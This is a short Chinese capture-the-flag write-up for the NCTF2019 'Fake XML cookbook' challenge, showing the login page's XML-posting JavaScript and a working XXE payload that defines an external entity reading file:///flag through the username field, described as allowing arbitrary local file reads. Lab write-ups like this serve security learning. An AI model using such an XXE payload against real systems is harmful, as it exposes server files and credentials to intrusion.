[NCTF2019]Fake XML cookbook
- 首先我们进入页面
-
然后我们查看一下源码发现有这样一个代码:
<script type='text/javascript'> function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || password == ""){ alert("Please enter the username and password!"); return; } var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; $.ajax({ type: "POST", url: "doLogin.php", contentType: "application/xml;charset=utf-8", data: data, dataType: "xml", anysc: false, success: function (result) { var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue; var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue; if(code == "0"){ $(".msg").text(msg + " login fail!"); }else if(code == "1"){ $(".msg").text(msg + " login success!"); }else{ $(".msg").text("error:" + msg); } }, error: function (XMLHttpRequest,textStatus,errorThrown) { $(".msg").text(errorThrown + ':' + textStatus); } }); } </script>-
然后看到题目XML联想到XXE漏洞
XXE漏洞参考链接:https://xz.aliyun.com/t/6887#toc-5
然后我们根据上面链接,直接构造payload
利用这个payload可以进行任意本地文件读取
flag一般在
/目录下或者/var/www/html/下,我们直接读取/目录下的flagpayload:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY penson SYSTEM "file:///flag" > //用file协议读取 ]> <user><username>&penson;</username><password>penson</password></user>最后我们得到flag:
-